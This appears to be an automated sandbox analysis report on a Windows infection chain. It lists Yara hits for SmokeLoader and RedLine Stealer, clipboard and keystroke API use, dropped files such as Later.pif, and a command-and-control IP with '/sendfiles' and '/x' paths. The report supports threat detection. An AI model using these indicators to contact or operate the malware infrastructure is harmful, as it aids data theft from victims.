Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:11:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:11:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c Data Ascii: #\6U9H-anYp7vZW\|
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:11:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:11:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:11:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:12:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:12:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:12:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:12:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:13:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:13:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:13:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:13:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:13:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:13:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:13:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:13:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:13:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:13:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:14:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 15 Jul 2024 04:14:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: Later.pif, Later.pif, 00000013.00000002.4560271483.0000000001668000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://46.246.96.149/
Source: Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://46.246.96.149/e_usertestGoogle
Source: Later.pif, 00000013.00000003.4155490022.0000000001690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.246.96.149/sendfiles
Source: Later.pif, 00000013.00000002.4560271483.0000000001668000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.246.96.149/x
Source: 9CFE.exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: explorer.exe, 00000002.00000000.2165593335.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2165593335.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 9CFE.exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: 9CFE.exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 9CFE.exe.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 9CFE.exe, 00000007.00000003.2847661594.000000000284F000.00000004.00000020.00020000.00000000.sdmp, Tracked.7.dr, Later.pif.8.dr	String found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0
Source: 9CFE.exe, 00000007.00000003.2847661594.000000000284F000.00000004.00000020.00020000.00000000.sdmp, Tracked.7.dr, Later.pif.8.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
Source: 9CFE.exe, 00000007.00000003.2847661594.000000000284F000.00000004.00000020.00020000.00000000.sdmp, Tracked.7.dr, Later.pif.8.dr	String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: explorer.exe, 00000002.00000000.2159497737.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: 9CFE.exe.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: explorer.exe, 00000002.00000000.2165593335.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2165593335.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: 9CFE.exe.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: 9CFE.exe.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: 9CFE.exe.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: explorer.exe, 00000002.00000000.2165593335.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2165593335.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 9CFE.exe.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: 9CFE.exe, 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmp, 9CFE.exe, 00000007.00000000.2816744193.0000000000408000.00000002.00000001.01000000.00000006.sdmp, 9CFE.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000002.00000000.2165593335.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2165593335.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, 9CFE.exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: 9CFE.exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: 9CFE.exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: 9CFE.exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000002.00000000.2165593335.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: 9CFE.exe, 00000007.00000003.2847661594.000000000284F000.00000004.00000020.00020000.00000000.sdmp, Tracked.7.dr, Later.pif.8.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesigng20
Source: explorer.exe, 00000002.00000000.2165022415.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2165059057.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2164441432.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: 9CFE.exe, 00000007.00000003.2847661594.000000000284F000.00000004.00000020.00020000.00000000.sdmp, Tracked.7.dr, Later.pif.8.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt04
Source: 9CFE.exe, 00000007.00000003.2847661594.000000000284F000.00000004.00000020.00020000.00000000.sdmp, Tracked.7.dr, Later.pif.8.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
Source: 9CFE.exe, 00000007.00000003.2847661594.000000000284F000.00000004.00000020.00020000.00000000.sdmp, Tracked.7.dr, Later.pif.8.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/0
Source: explorer.exe, 00000002.00000000.2171644821.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2171644821.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, 9CFE.exe, 00000007.00000003.2819759144.0000000002843000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000011.00000000.2887878869.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp, Later.pif, 00000013.00000000.3863074525.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp, Later.pif.8.dr, Services.7.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 9CFE.exe.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000002.00000000.2169172089.000000000C549000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000002.00000000.2163432174.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.2165593335.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.2163432174.0000000007637000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000000.2162269436.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000002.00000000.2169172089.000000000C460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000002.00000000.2165593335.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000002.00000000.2165593335.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comon
Source: Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 9CFE.exe, 00000007.00000003.2847661594.000000000284F000.00000004.00000020.00020000.00000000.sdmp, Tracked.7.dr, Later.pif.8.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: 9CFE.exe, 00000007.00000003.2847661594.000000000284F000.00000004.00000020.00020000.00000000.sdmp, Tracked.7.dr, Later.pif.8.dr	String found in binary or memory: https://www.globalsign.com/repository/03
Source: Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727

Source: unknown

HTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.5:49727 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.2183305137.0000000003C21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2182890350.0000000002230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2417255562.0000000003FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2417195309.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\9CFE.exe

Code function: 7_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

7_2_004050CD

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Code function: 19_2_00C64614 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

19_2_00C64614

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Code function: 19_2_00C64416 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

19_2_00C64416

Source: C:\Users\user\AppData\Local\Temp\9CFE.exe

Code function: 7_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

7_2_004044A5

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Code function: 19_2_00C7CEDF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

19_2_00C7CEDF

System Summary

Malicious sample detected (through community Yara rule)

Source: 19.2.Later.pif.1400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 19.2.Later.pif.1400000.1.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 00000000.00000002.2183305137.0000000003C21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2182890350.0000000002230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2417051568.000000000214B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 00000000.00000002.2182772532.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.2417255562.0000000003FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2417195309.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2417110423.0000000002240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2183129368.000000000229B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401538 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401538
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402FE9 RtlCreateUserThread,NtTerminateProcess,	0_2_00402FE9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004014DE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014DE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401496 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401496
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401543 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401543
